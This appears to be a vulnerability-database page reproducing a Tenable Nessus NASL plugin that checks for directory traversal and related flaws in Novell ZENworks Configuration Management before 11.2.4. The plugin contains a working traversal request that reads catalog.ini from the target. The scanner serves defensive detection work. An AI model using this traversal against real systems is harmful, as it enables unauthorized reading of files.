CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
Confidence
Low
EPSS
Percentile
99.5%
The version of Novell ZENworks Configuration Management installed on the remote host can be tricked into disclosing any file readable by the Novell ZENworks umaninv service, and as such it is affected by multiple vulnerabilities :
A directory traversal vulnerability exists that allows any file readable by the Novell ZENworks umaniv service to be disclosed. (CVE-2013-1084)
An unspecified flaw in the ZENworks Control Center page that can result in an application exception with an unspecified impact. (CVE-2013-6345)
An unspecified cross site request forgery flaw in the ZENworks Control Center page. (CVE-2013-6346)
An unspecified cross frame scripting flaw in the ZENworks Control Center page. (CVE-2013-6344)
An unspecified session fixation flaw in the ZENworks Control Center page. (CVE-2013-6347)
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(70726);
script_version("1.15");
script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");
script_cve_id(
"CVE-2013-1084",
"CVE-2013-6344",
"CVE-2013-6345",
"CVE-2013-6346",
"CVE-2013-6347"
);
script_bugtraq_id(
63433,
63495,
63497,
63498,
63499
);
script_name(english:"Novell ZENworks Configuration Management < 11.2.4 Multiple Vulnerabilities");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is running a configuration management
application affected by multiple vulnerabilities.");
script_set_attribute(attribute:"description", value:
"The version of Novell ZENworks Configuration Management installed on
the remote host can be tricked into disclosing any file readable by the
Novell ZENworks umaninv service, and as such it is affected by multiple
vulnerabilities :
- A directory traversal vulnerability exists that allows
any file readable by the Novell ZENworks umaniv service
to be disclosed. (CVE-2013-1084)
- An unspecified flaw in the ZENworks Control Center page
that can result in an application exception with an
unspecified impact. (CVE-2013-6345)
- An unspecified cross site request forgery flaw in the
ZENworks Control Center page. (CVE-2013-6346)
- An unspecified cross frame scripting flaw in the
ZENworks Control Center page. (CVE-2013-6344)
- An unspecified session fixation flaw in the ZENworks
Control Center page. (CVE-2013-6347)");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-258/");
script_set_attribute(attribute:"see_also", value:"https://support.microfocus.com/kb/doc.php?id=7012760");
script_set_attribute(attribute:"see_also", value:"https://support.microfocus.com/kb/doc.php?id=7012027");
script_set_attribute(attribute:"solution", value:
"Update to Novell ZENworks 11.2.4 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2013/10/29");
script_set_attribute(attribute:"patch_publication_date", value:"2013/10/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/11/01");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:novell:zenworks_configuration_management");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2013-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("novell_zenworks_control_center_detect.nasl");
script_require_keys("www/zenworks_control_center");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 443);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
port = get_http_port(default:443);
install = get_install_from_kb(
appname : "zenworks_control_center",
port : port,
exit_on_fail : TRUE
);
path = "/zenworks-unmaninv/?action=GetFile&Filename=../../catalog.ini&Type=4&Platform=11&Lang=0";
flag = "[Catalog]";
r = http_send_recv3(method:"GET", item:path, port:port, exit_on_fail:TRUE);
status = r[0];
body = r[2];
if ("200 OK" >< status && flag >< body)
{
report = string(
"\n Nessus was able to read the contents of a file using the",
"\n following request:\n\n",
path,"\n");
if (report_verbosity > 0)
{
if ( ! defined_func("security_report_with_attachments") )
security_hole(port:port, extra:report);
else
{
attachments = make_list();
attachments[0] = make_array();
attachments[0]["type"] = "text/plain";
attachments[0]["name"] = "config.ini";
attachments[0]["value"] = body;
security_report_with_attachments(level:3, port:port, extra:report, attachments:attachments);
}
}
else security_hole(port);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Novell ZENworks Configuration Manager", port);
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1084
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6344
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6345
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6346
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6347
support.microfocus.com/kb/doc.php?id=7012027
support.microfocus.com/kb/doc.php?id=7012760
www.zerodayinitiative.com/advisories/ZDI-13-258/
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
Confidence
Low
EPSS
Percentile
99.5%